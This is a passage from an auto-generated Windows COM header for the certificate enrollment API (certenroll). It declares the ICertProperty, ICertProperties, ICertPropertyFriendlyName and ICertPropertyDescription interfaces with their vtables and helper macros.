        XCN_CERT_SCEP_ENCRYPT_HASH_CNG_ALG_PROP_ID	= 114,
        XCN_CERT_SCEP_FLAGS_PROP_ID	= 115,
        XCN_CERT_SCEP_GUID_PROP_ID	= 116,
        XCN_CERT_SERIALIZABLE_KEY_CONTEXT_PROP_ID	= 117,
        XCN_CERT_ISOLATED_KEY_PROP_ID	= 118,
        XCN_CERT_SERIAL_CHAIN_PROP_ID	= 119,
        XCN_CERT_KEY_CLASSIFICATION_PROP_ID	= 120,
        XCN_CERT_DISALLOWED_ENHKEY_USAGE_PROP_ID	= 122,
        XCN_CERT_NONCOMPLIANT_ROOT_URL_PROP_ID	= 123,
        XCN_CERT_PIN_SHA256_HASH_PROP_ID	= 124,
        XCN_CERT_CLR_DELETE_KEY_PROP_ID	= 125,
        XCN_CERT_NOT_BEFORE_FILETIME_PROP_ID	= 126,
        XCN_CERT_CERT_NOT_BEFORE_ENHKEY_USAGE_PROP_ID	= 127,
        XCN_CERT_FIRST_RESERVED_PROP_ID	= 128,
        XCN_CERT_LAST_RESERVED_PROP_ID	= 0x7fff,
        XCN_CERT_FIRST_USER_PROP_ID	= 0x8000,
        XCN_CERT_LAST_USER_PROP_ID	= 0xffff,
        XCN_CERT_STORE_LOCALIZED_NAME_PROP_ID	= 0x1000
    } 	CERTENROLL_PROPERTYID;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0048_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0048_v0_0_s_ifspec;

#ifndef __ICertProperty_INTERFACE_DEFINED__
#define __ICertProperty_INTERFACE_DEFINED__

/* interface ICertProperty */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertProperty;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab32e-217d-11da-b2a4-000e7bbb2b09")
    ICertProperty : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeFromCertificate( 
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_PropertyId( 
            /* [retval][out] */ __RPC__out CERTENROLL_PROPERTYID *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_PropertyId( 
            /* [in] */ CERTENROLL_PROPERTYID Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RawData( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE RemoveFromCertificate( 
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE SetValueOnCertificate( 
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertPropertyVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertProperty * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertProperty * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertProperty * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertProperty * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertProperty * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertProperty * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertProperty * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in ICertProperty * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in ICertProperty * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PropertyId )( 
            __RPC__in ICertProperty * This,
            /* [retval][out] */ __RPC__out CERTENROLL_PROPERTYID *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_PropertyId )( 
            __RPC__in ICertProperty * This,
            /* [in] */ CERTENROLL_PROPERTYID Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in ICertProperty * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveFromCertificate )( 
            __RPC__in ICertProperty * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *SetValueOnCertificate )( 
            __RPC__in ICertProperty * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        END_INTERFACE
    } ICertPropertyVtbl;

    interface ICertProperty
    {
        CONST_VTBL struct ICertPropertyVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertProperty_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertProperty_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertProperty_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertProperty_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertProperty_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertProperty_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertProperty_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertProperty_InitializeFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertProperty_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define ICertProperty_get_PropertyId(This,pValue)	\
    ( (This)->lpVtbl -> get_PropertyId(This,pValue) ) 

#define ICertProperty_put_PropertyId(This,Value)	\
    ( (This)->lpVtbl -> put_PropertyId(This,Value) ) 

#define ICertProperty_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define ICertProperty_RemoveFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> RemoveFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertProperty_SetValueOnCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> SetValueOnCertificate(This,MachineContext,Encoding,strCertificate) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertProperty_INTERFACE_DEFINED__ */


#ifndef __ICertProperties_INTERFACE_DEFINED__
#define __ICertProperties_INTERFACE_DEFINED__

/* interface ICertProperties */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertProperties;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab32f-217d-11da-b2a4-000e7bbb2b09")
    ICertProperties : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget][custom] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ICertProperty **pVal) = 0;
        
        virtual /* [helpstring][id][propget][custom] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id][custom] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt ICertProperty *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromCertificate( 
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertPropertiesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertProperties * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertProperties * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertProperties * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertProperties * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertProperties * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertProperties * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertProperties * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [helpstring][id][propget][custom] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in ICertProperties * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ICertProperty **pVal);
        
        /* [helpstring][id][propget][custom] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in ICertProperties * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in ICertProperties * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id][custom] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in ICertProperties * This,
            /* [in] */ __RPC__in_opt ICertProperty *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in ICertProperties * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in ICertProperties * This);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in ICertProperties * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        END_INTERFACE
    } ICertPropertiesVtbl;

    interface ICertProperties
    {
        CONST_VTBL struct ICertPropertiesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertProperties_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertProperties_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertProperties_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertProperties_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertProperties_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertProperties_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertProperties_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertProperties_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define ICertProperties_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define ICertProperties_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define ICertProperties_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define ICertProperties_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define ICertProperties_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#define ICertProperties_InitializeFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertProperties_INTERFACE_DEFINED__ */


#ifndef __ICertPropertyFriendlyName_INTERFACE_DEFINED__
#define __ICertPropertyFriendlyName_INTERFACE_DEFINED__

/* interface ICertPropertyFriendlyName */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertPropertyFriendlyName;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab330-217d-11da-b2a4-000e7bbb2b09")
    ICertPropertyFriendlyName : public ICertProperty
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in BSTR strFriendlyName) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_FriendlyName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertPropertyFriendlyNameVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertPropertyFriendlyName * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertPropertyFriendlyName * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertPropertyFriendlyName * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertPropertyFriendlyName * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertPropertyFriendlyName * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertPropertyFriendlyName * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertPropertyFriendlyName * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in ICertPropertyFriendlyName * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in ICertPropertyFriendlyName * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PropertyId )( 
            __RPC__in ICertPropertyFriendlyName * This,
            /* [retval][out] */ __RPC__out CERTENROLL_PROPERTYID *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_PropertyId )( 
            __RPC__in ICertPropertyFriendlyName * This,
            /* [in] */ CERTENROLL_PROPERTYID Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in ICertPropertyFriendlyName * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveFromCertificate )( 
            __RPC__in ICertPropertyFriendlyName * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *SetValueOnCertificate )( 
            __RPC__in ICertPropertyFriendlyName * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertPropertyFriendlyName * This,
            /* [in] */ __RPC__in BSTR strFriendlyName);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_FriendlyName )( 
            __RPC__in ICertPropertyFriendlyName * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } ICertPropertyFriendlyNameVtbl;

    interface ICertPropertyFriendlyName
    {
        CONST_VTBL struct ICertPropertyFriendlyNameVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertPropertyFriendlyName_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertPropertyFriendlyName_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertPropertyFriendlyName_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertPropertyFriendlyName_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertPropertyFriendlyName_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertPropertyFriendlyName_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertPropertyFriendlyName_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertPropertyFriendlyName_InitializeFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyFriendlyName_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define ICertPropertyFriendlyName_get_PropertyId(This,pValue)	\
    ( (This)->lpVtbl -> get_PropertyId(This,pValue) ) 

#define ICertPropertyFriendlyName_put_PropertyId(This,Value)	\
    ( (This)->lpVtbl -> put_PropertyId(This,Value) ) 

#define ICertPropertyFriendlyName_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define ICertPropertyFriendlyName_RemoveFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> RemoveFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyFriendlyName_SetValueOnCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> SetValueOnCertificate(This,MachineContext,Encoding,strCertificate) ) 


#define ICertPropertyFriendlyName_Initialize(This,strFriendlyName)	\
    ( (This)->lpVtbl -> Initialize(This,strFriendlyName) ) 

#define ICertPropertyFriendlyName_get_FriendlyName(This,pValue)	\
    ( (This)->lpVtbl -> get_FriendlyName(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertPropertyFriendlyName_INTERFACE_DEFINED__ */


#ifndef __ICertPropertyDescription_INTERFACE_DEFINED__
#define __ICertPropertyDescription_INTERFACE_DEFINED__

/* interface ICertPropertyDescription */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertPropertyDescription;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab331-217d-11da-b2a4-000e7bbb2b09")
    ICertPropertyDescription : public ICertProperty
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in BSTR strDescription) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Description( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertPropertyDescriptionVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertPropertyDescription * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertPropertyDescription * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertPropertyDescription * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertPropertyDescription * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertPropertyDescription * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertPropertyDescription * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertPropertyDescription * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in ICertPropertyDescription * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in ICertPropertyDescription * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PropertyId )( 
            __RPC__in ICertPropertyDescription * This,
            /* [retval][out] */ __RPC__out CERTENROLL_PROPERTYID *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_PropertyId )( 
            __RPC__in ICertPropertyDescription * This,
            /* [in] */ CERTENROLL_PROPERTYID Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in ICertPropertyDescription * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveFromCertificate )( 
            __RPC__in ICertPropertyDescription * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *SetValueOnCertificate )( 
            __RPC__in ICertPropertyDescription * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertPropertyDescription * This,
            /* [in] */ __RPC__in BSTR strDescription);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Description )( 
            __RPC__in ICertPropertyDescription * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } ICertPropertyDescriptionVtbl;

    interface ICertPropertyDescription
    {
        CONST_VTBL struct ICertPropertyDescriptionVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertPropertyDescription_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertPropertyDescription_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertPropertyDescription_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertPropertyDescription_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertPropertyDescription_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertPropertyDescription_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertPropertyDescription_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
